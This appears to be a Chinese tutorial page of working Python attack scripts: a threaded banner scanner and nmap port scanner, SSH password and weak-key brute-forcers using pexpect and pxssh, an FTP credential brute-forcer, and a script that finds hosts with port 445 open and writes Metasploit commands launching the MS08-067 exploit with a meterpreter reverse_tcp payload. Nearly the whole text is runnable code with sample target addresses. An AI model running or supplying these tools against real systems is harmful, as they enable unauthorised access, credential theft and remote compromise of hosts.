使用 Python 编写密码爆破工具


TCP连接扫描、抓取应用的Banner

#coding=utf-8
from socket import *
from threading import *

# Binary semaphore used as a mutex so that output lines printed by the
# worker threads do not interleave on the console.
screenLock = Semaphore(value=1)

def ScanBanner(addr,port):
    """Connect to addr:port over TCP, send a probe line and print the reply.

    addr: target host (IP address or host name).
    port: TCP port number to connect to.

    Prints a "[+]" line with the first 200 bytes received, or a "[-]" line
    when the connection or the exchange fails. Returns None.
    """
    conn = None
    try:
        conn = socket(AF_INET, SOCK_STREAM)
        conn.connect((addr, port))
        conn.send(bytes("hello lyshark\r\n", encoding="utf-8"))
        res = conn.recv(200)
    except Exception:
        # Best effort: any failure is reported as "host unreachable".
        # The lock is taken only around the print, so it can never be
        # acquired twice by the same call (which would deadlock).
        with screenLock:
            print("[-] 主机: {} 不存在或已经关闭.".format(addr))
    else:
        with screenLock:
            print("[+] 主机: {} Banner: {}".format(addr, res))
    finally:
        # conn stays None when socket() itself failed.
        if conn is not None:
            conn.close()

# Give every socket created from here on a 1-second default timeout.
setdefaulttimeout(1)

# Probe port 80 on 192.168.1.0 .. 192.168.1.24, one thread per address.
for last_octet in range(25):
    target = "192.168.1.{}".format(last_octet)
    Thread(target=ScanBanner, args=(target, 80)).start()

使用nmap端口扫描代码

需要 pip install python-nmap

#coding=utf-8

# >>> nm = nmap.PortScanner()
# >>> nm.scan("192.168.1.1-20","21,22,80,45,135","-sV")
# >>> nm.scan(hosts="192.168.1.20",arguments="-n -sP -PE -PA21,22,80")

import nmap
import optparse

def nmapScan(tgtHost,tgtPort):
    """Scan one TCP port of tgtHost with nmap and print the port state.

    tgtHost: target host passed to nmap.
    tgtPort: port number as a string (it is concatenated into the output
             and converted with int() for the result lookup).
    """
    # Create the scanner object and run the scan for this host/port.
    nmScan = nmap.PortScanner()
    nmScan.scan(tgtHost,tgtPort)

    # Read the port state out of the scan result. The result may have no
    # entry for the host or port (e.g. the host did not answer); report
    # that as "unknown" instead of dying with a KeyError.
    try:
        state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
    except KeyError:
        state = 'unknown'
    print('[*] ' + tgtHost + " tcp/" + tgtPort + " " + state)

def main():
    """Parse -H/-p from the command line and scan every requested port.

    Prints the usage text and exits with status 0 when either option is
    missing.
    """
    parser=optparse.OptionParser("[*] Usage : ./nmapScan.py -H <target host> -p <target port>")
    parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
    parser.add_option('-p',dest='tgtPorts',type='string',help='specify target port[s]')
    (options,args)=parser.parse_args()
    tgtHost = options.tgtHost
    # Test the raw option value: str(None).split(',') would yield ['None'],
    # which hides a missing -p from the check.
    if tgtHost is None or options.tgtPorts is None:
        print(parser.usage)
        raise SystemExit(0)
    for tgtPort in options.tgtPorts.split(','):
        tgtPort = tgtPort.strip()
        if tgtPort:  # ignore empty items such as a trailing comma
            nmapScan(tgtHost,tgtPort)

if __name__ == '__main__':
    main()

用Pexpect与SSH交互

需要先下载Pexpect:pip install pexpect  该工具只能在linux系统中使用,且可以登录ftp等,不局限于ssh

#coding=utf-8
import pexpect
from threading import *

def SSHConnect(Host,User,Password,Port):
    """Attempt one SSH password login by driving the ssh client with pexpect.

    Host, User, Password: strings describing the login to try.
    Port: SSH port (converted with str()).

    Returns 1 when one of the shell prompt patterns appears after the
    password was sent, otherwise 0 (timeout, no password prompt, pexpect or
    OS error).
    """
    # Raw string: "\$" is a regex escape, not a Python string escape.
    PROMPT = ["# ", ">>> ", "> ", r"\$ "]
    ssh_newkey = 'Are you sure you want to continue connecting'
    # "[Pp]" instead of "[P|p]": inside a character class "|" is a literal.
    password_prompt = '[Pp]assword: '
    child = None
    try:
        # Spawn ssh with an explicit argument list so that the values are
        # passed through unchanged (no word splitting of the command line).
        child = pexpect.spawn('ssh', [User + '@' + Host, '-p', str(Port)], timeout=1)
        # Wait for the host-key question or the password prompt.
        ret = child.expect([pexpect.TIMEOUT, ssh_newkey, password_prompt])
        if ret == 1:
            # Accept the new host key, then wait for the password prompt.
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT, ssh_newkey, password_prompt])
        if ret != 2:
            # Timed out, or no password prompt was reached.
            return 0
        child.sendline(Password)
        child.expect(PROMPT)
        return 1
    except (pexpect.ExceptionPexpect, OSError):
        # TIMEOUT/EOF while waiting for the prompt, or ssh could not be run.
        return 0
    finally:
        # Always reap the ssh process; the caller only gets a status code.
        if child is not None:
            child.close(force=True)
# Demo: try a single login and print the status code returned by SSHConnect.
child = SSHConnect(Host="192.168.1.20", User="root", Password="123", Port="22")
print(child)

pexpect 登录执行命令

#-*- coding:UTF-8 -*-
import pexpect


def ssh(user,host,password,port,command):
    """Run `command` on `host` through the ssh client and return its output.

    Returns the text captured by pexpect up to end-of-file on success, or 0
    when a prompt times out or the password is rejected. pexpect exceptions
    raised by the first expect() (e.g. EOF because ssh exited immediately)
    propagate to the caller.
    """
    child = pexpect.spawn('ssh -l %s %s -p %s %s' %(user,host,port,command))
    try:
        # 0: timeout
        # 1: ssh asks whether to accept the host key
        # 2: password prompt
        # 3: a '>' or '#' was seen without any password prompt
        ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
        if ret == 0:
            return 0
        if ret == 1:
            # Accept the host key, then wait ONCE for the password prompt
            # (a second expect for the same prompt would always time out).
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT, '[Pp]assword:'])
            if ret == 0:
                return 0
            ret = 2
        if ret == 2:
            # sendline() returns a byte count, not a status; do not test it.
            child.sendline(password)
            head = None
        else:
            # No password was requested: keep what was already consumed by
            # the match so it is not lost from the returned output.
            head = child.before + child.after
        # Wait for the remote command to finish. The middle pattern is the
        # message the OpenSSH client prints for a rejected password
        # (NOTE(review): confirm wording for other ssh clients).
        ret = child.expect([pexpect.TIMEOUT, 'Permission denied, please try again', pexpect.EOF])
        if ret != 2:
            return 0
        return child.before if head is None else head + child.before
    finally:
        child.close()


if __name__ =='__main__':
    # Demo parameters for a single remote command.
    host, user, password = '192.168.1.20', "root", '1233'
    command = "ifconfig"
    try:
        child = ssh(user, host, password, "22", command)
        print(child)
    except Exception as e:
        # Report any failure raised while talking to ssh.
        print (e)

用pexpect 暴力破解SSH密码

#coding=utf-8
import pexpect
import os,sys
import threading
from optparse import OptionParser

def SSHConnect(Host,User,Password,Port):
    """Attempt one SSH password login by driving the ssh client with pexpect.

    Host, User, Password: strings describing the login to try.
    Port: SSH port (converted with str()).

    Returns 1 when one of the shell prompt patterns appears after the
    password was sent, otherwise 0 (timeout, no password prompt, pexpect or
    OS error).
    """
    # Raw string: "\$" is a regex escape, not a Python string escape.
    PROMPT = ["# ", ">>> ", "> ", r"\$ "]
    ssh_newkey = 'Are you sure you want to continue connecting'
    # "[Pp]" instead of "[P|p]": inside a character class "|" is a literal.
    password_prompt = '[Pp]assword: '
    child = None
    try:
        # Spawn ssh with an explicit argument list so that the values are
        # passed through unchanged (no word splitting of the command line).
        child = pexpect.spawn('ssh', [User + '@' + Host, '-p', str(Port)], timeout=1)
        # Wait for the host-key question or the password prompt.
        ret = child.expect([pexpect.TIMEOUT, ssh_newkey, password_prompt])
        if ret == 1:
            # Accept the new host key, then wait for the password prompt.
            child.sendline('yes')
            ret = child.expect([pexpect.TIMEOUT, ssh_newkey, password_prompt])
        if ret != 2:
            # Timed out, or no password prompt was reached.
            return 0
        child.sendline(Password)
        child.expect(PROMPT)
        return 1
    except (pexpect.ExceptionPexpect, OSError):
        # TIMEOUT/EOF while waiting for the prompt, or ssh could not be run.
        return 0
    finally:
        # Always reap the ssh process; the caller only gets a status code.
        if child is not None:
            child.close(force=True)

def ThreadBlast(Host,User,Password,Port,semaphore):
    """Thread worker: try one password while holding a slot of `semaphore`.

    Prints a "[+]" line including the password when SSHConnect returns 1,
    otherwise a "[-]" line with the status code.
    """
    # The with-statement releases the slot on every path (success, failure
    # or exception), so the pool of concurrent attempts never shrinks.
    with semaphore:
        RetCode = SSHConnect(Host,User,Password,Port)
        if RetCode == 1:
            print("[+] --> 主机: {} 状态码: {} -------> 密码: {}".format(Host,RetCode,Password))
        else:
            print("[-] --> 主机: {} 状态码: {}".format(Host,RetCode))

if __name__ == "__main__":
    # Command line: all four options are required, otherwise help is shown.
    parser = OptionParser()
    parser.add_option("-H","--host",dest="host",help="set host 192.168.1.1")
    parser.add_option("-u","--user",dest="user",help="set user root")
    parser.add_option("-p","--port",dest="port",help="set port 22")
    parser.add_option("-f","--file",dest="file",help="set file wordlist.log")
    (options,args) = parser.parse_args()
    if options.host and options.user and options.port and options.file:
        # Semaphore shared by the workers: at most 5 attempts run at once.
        semaphore = threading.Semaphore(5)
        # Read the word list and close the file right away; drop the line
        # terminators so they are not sent as part of the password.
        with open(options.file,"r") as fp:
            PassList = [line.strip("\r\n") for line in fp]
        for item in PassList:
            if not item:
                continue  # skip blank lines in the word list
            t = threading.Thread(target=ThreadBlast,args=(options.host,options.user,item,options.port,semaphore))
            t.start()
    else:
        parser.print_help()

关于密码有时验证失败的问题,现已解决(如下图),这里就不再贴出代码了;上面的代码仍有一些问题,请读者自行修改。

用pxssh 暴力破解SSH密码

# -*- coding: utf-8 -*-
import optparse
from pexpect import pxssh
import time
from threading import *

maxConnections = 5
# Caps the number of login attempts running at the same time.
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False   # set to True by a worker once a password is accepted
Fails = 0       # number of "read_nonblocking" failures seen so far

def connect(host, user, password, release):
    """Try to log in with pxssh, retrying on transient errors.

    host, user, password: login to attempt.
    release: when true, release one slot of connection_lock before
             returning (the caller acquired it before starting the worker).

    Sets the global Found on success and counts "read_nonblocking"
    failures in the global Fails. Any other login error (e.g. a refused
    password) ends the attempt silently.
    """
    global Found
    global Fails
    # Bounded loop instead of unbounded recursion for the retries.
    retries_left = 5
    try:
        while True:
            s = pxssh.pxssh()
            try:
                s.login(host, user, password)
            except Exception as e:
                s.close()
                reason = str(e)
                if "read_nonblocking" in reason:
                    Fails += 1
                    delay = 5
                elif "synchronize with original prompt" in reason:
                    delay = 1
                else:
                    return
                retries_left -= 1
                # Stop retrying once the overall run is finished anyway.
                if retries_left <= 0 or Found or Fails > 5:
                    return
                time.sleep(delay)
                continue
            print("[+] Password Found " + password)
            Found = True
            s.close()
            return
    finally:
        if release:
            connection_lock.release()
def main():
    """Read passwords from the -F file and start one login thread per line.

    Prints the usage line and exits with status 0 when -H, -u or -F is
    missing. Stops handing out passwords as soon as a worker has set Found
    or more than 5 socket timeouts were counted in Fails.
    """
    parser = optparse.OptionParser("%prog -H <target host> -u <user> -F <password file>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-u", dest="user", type="string", help="specify the user")
    parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
    options, args = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwordFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        # print_usage() expands %prog to the script name.
        parser.print_usage()
        raise SystemExit(0)
    # The with-statement closes the password file on every exit path.
    with open(passwdFile, "r") as fn:
        for line in fn:
            if Found:
                # A worker found the password: stop.
                print("[*] Exiting: Password Found")
                raise SystemExit(0)
            if Fails > 5:
                print("[!] Too Many Socket Timeouts")
                raise SystemExit(0)
            password = line.strip("\r\n")
            if not password:
                continue  # skip blank lines
            # Blocks until one of the concurrent slots is free; the worker
            # releases it when it finishes.
            connection_lock.acquire()
            print("[-] Testing: " + str(password))
            t = Thread(target=connect, args=(host, user, password, True))
            t.start()

if __name__ == "__main__":
    main()

利用SSH中的弱密钥

使用密钥登录ssh时,格式为:ssh user@host -i keyfile -o PasswordAuthentication=no

#!/usr/bin/python
#coding=utf-8
import pexpect
import optparse
import os
from threading import *

maxConnections = 5
# Bounded semaphore: release() checks that the counter never exceeds its
# initial value.
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False    # set to True by a worker once a key is accepted
Fails = 0       # number of "Connection closed by remote host" results

def connect(host,user,keyfile,release):
    """Try to log in as user@host with the private key in `keyfile`.

    release: when true, release one slot of connection_lock before
             returning (the caller acquired it before starting the worker).

    Sets the global Stop when a shell prompt is seen and increments the
    global Fails when the remote side closes the connection.
    """
    global Stop
    global Fails

    child = None
    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        # Explicit argument list: key paths are passed through unchanged.
        child = pexpect.spawn('ssh', [user + '@' + host, '-i', keyfile,
                                      '-o', 'PasswordAuthentication=no'])
        # r'\$' matches a literal dollar prompt; a bare '$' is the regex
        # end-of-input anchor and would match any buffer.
        patterns = [pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed,
                    r'\$', '#', pexpect.EOF]
        ret = child.expect(patterns)
        # Host-key question: answer it and keep waiting on the same session.
        if ret == 2:
            print('[-] Adding Host to ~/.ssh/known_hosts')
            child.sendline('yes')
            ret = child.expect(patterns)
        # Connection closed by the remote host.
        if ret == 3:
            print('[-] Connection Closed By Remote Host')
            Fails += 1
        # A '$' or '#' prompt was reached.
        elif ret in (4, 5):
            print('[+] Success. ' + str(keyfile))
            Stop = True
    finally:
        if child is not None:
            child.close(force=True)
        if release:
            # Give the slot back to the pool.
            connection_lock.release()

def main():
    """Try every file in the -d directory as an SSH private key.

    Prints the usage text and exits with status 0 when -H, -u or -d is
    missing. Stops starting new attempts once a worker has set Stop or more
    than 5 closed connections were counted in Fails.
    """
    parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H <target host> -u <user> -d <directory>')
    parser.add_option('-H',dest='host',type='string',help='specify target host')
    parser.add_option('-u',dest='username',type='string',help='target username')
    parser.add_option('-d',dest='passDir',type='string',help='specify directory with keys')
    (options,args) = parser.parse_args()

    if options.host is None or options.username is None or options.passDir is None:
        print(parser.usage)
        raise SystemExit(0)

    host = options.host
    username = options.username
    passDir = options.passDir

    # os.listdir() returns the names of all entries in the directory.
    for filename in os.listdir(passDir):
        if Stop:
            print('[*] Exiting: Key Found.')
            raise SystemExit(0)
        if Fails > 5:
            print('[!] Exiting: Too Many Connections Closed By Remote Host.')
            print('[!] Adjust number of simultaneous threads.')
            raise SystemExit(0)
        # Blocks until one of the concurrent slots is free.
        connection_lock.acquire()

        # Build the full path of the candidate key file.
        fullpath = os.path.join(passDir,filename)
        print('[-] Testing keyfile ' + str(fullpath))
        # Argument order follows connect(host, user, keyfile, release).
        t = Thread(target=connect,args=(host,username,fullpath,True))
        t.start()

if __name__ =='__main__':
    main()

使用Ftplib暴力破解FTP用户口令

通过ftplib模块,结合读取含有密码的文件来实现FTP用户口令的破解

#!/usr/bin/python
#coding=utf-8
import ftplib

def bruteLogin(hostname,passwdFile):
    """Try the "user:password" pairs listed in passwdFile against an FTP host.

    hostname: FTP server to connect to.
    passwdFile: path of a text file with one "user:password" pair per line.

    Returns (username, password) for the first pair the server accepts, or
    (None, None) when none works. Lines without a ':' are skipped.
    """
    with open(passwdFile,'r') as pF:
        lines = pF.readlines()
    for line in lines:
        line = line.strip('\r\n')
        if ':' not in line:
            continue  # blank or malformed line
        # Split on the first ':' only, so passwords may contain ':'.
        username, password = line.split(':', 1)
        print('[+] Trying: ' + username + '/' + password)
        ftp = None
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username,password)
        except ftplib.all_errors:
            # Connection or login failed: drop the socket and try the next pair.
            if ftp is not None:
                ftp.close()
            continue
        print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password)
        try:
            ftp.quit()
        except ftplib.all_errors:
            # A failing QUIT must not hide the successful login.
            ftp.close()
        return (username,password)
    print('\n[-] Could not brute force FTP credentials.')
    return (None,None)

# Demo run: credential list file and target server.
passwdFile = 'ftpBL.txt'
host = '10.10.10.128'
bruteLogin(hostname=host, passwdFile=passwdFile)

在FTP服务器上搜索网页

有了FTP服务器的登录口令之后,可以进行测试该服务器是否提供Web服务,其中检测通过nlst()列出的每个文件的文件名是不是默认的Web页面文件名,并把找到的所有默认的网页都添加到retList数组中

#!/usr/bin/python
#coding=utf-8
import ftplib

def returnDefault(ftp):
    """Return the names in the FTP server's current directory that look like web pages.

    ftp: a logged-in connection object providing nlst().

    A name qualifies when its lower-cased form contains '.php', '.asp' or
    '.htm'. Returns the list of matching names (original spelling), or None
    when the directory listing fails.
    """
    try:
        # nlst() returns the file names of the current directory.
        dirList = ftp.nlst()
    except ftplib.all_errors:
        print('[-] Could not list directory contents.')
        print('[-] Skipping To Next Target.')
        return None

    retList = []
    for filename in dirList:
        # Compare case-insensitively, but report the original name.
        fn = filename.lower()
        if '.php' in fn or '.asp' in fn or '.htm' in fn:
            print('[+] Found default page: '+filename)
            retList.append(filename)
    return retList

# Demo run: log in with known credentials and list candidate web pages.
host, username, password = '10.10.10.130', 'ftpuser', 'ftppassword'
ftp = ftplib.FTP(host)
ftp.login(user=username, passwd=password)
returnDefault(ftp)

编写Python脚本与Metasploit交互

在findTgts()函数中实现对整个网段的主机445端口的扫描,setupHandler()函数实现目标主机被攻击后进行远程交互的监听器的功能

#!/usr/bin/python
#coding=utf-8

import nmap

def findTgts(subNet):
    """Scan subNet for hosts with TCP port 445 open and return their addresses.

    subNet: host specification passed to nmap's scan().

    Prints one "[+]" line per host found and returns the hosts as a list.
    """
    nmScan = nmap.PortScanner()
    nmScan.scan(subNet,'445')
    tgtHosts = []
    for host in nmScan.all_hosts():
        # Keep the host only when the result has a TCP/445 entry and that
        # entry reports the port as open.
        if nmScan[host].has_tcp(445) and nmScan[host]['tcp'][445]['state'] == 'open':
            print('[+] Found Target Host: ' + host)
            tgtHosts.append(host)
    return tgtHosts

def setupHandler(configFile,lhost,lport):
    """Write the console commands for a background multi/handler listener.

    configFile: writable text file object receiving the commands.
    lhost: local address as a string.
    lport: local port (converted with str()).
    """
    def _commands():
        # Yielded lazily, so each line is built right before it is written.
        yield 'use exploit/multi/handler\n'
        yield 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
        yield 'set LPORT ' + str(lport) + '\n'
        yield 'set LHOST ' + lhost + '\n'
        yield 'exploit -j -z\n'
        # setg sets a global option: with DisablePayloadHandler enabled,
        # later modules do not start another listener of their own.
        yield 'setg DisablePayloadHandler 1\n'

    for command in _commands():
        configFile.write(command)

def confickerExploit(configFile,tgtHost,lhost,lport):
    """Write the console commands that launch ms08_067_netapi against tgtHost.

    configFile: writable text file object receiving the commands.
    tgtHost: remote host (converted with str()).
    lhost: local address as a string.
    lport: local port (converted with str()).
    """
    emit = configFile.write
    emit('use exploit/windows/smb/ms08_067_netapi\n')
    emit('set RHOST ' + str(tgtHost) + '\n')
    emit('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    emit('set LPORT ' + str(lport) + '\n')
    emit('set LHOST ' + lhost + '\n')
    # -j runs the exploit as a background job; -z does not interact with
    # the session once it is opened.
    emit('exploit -j -z\n')

相关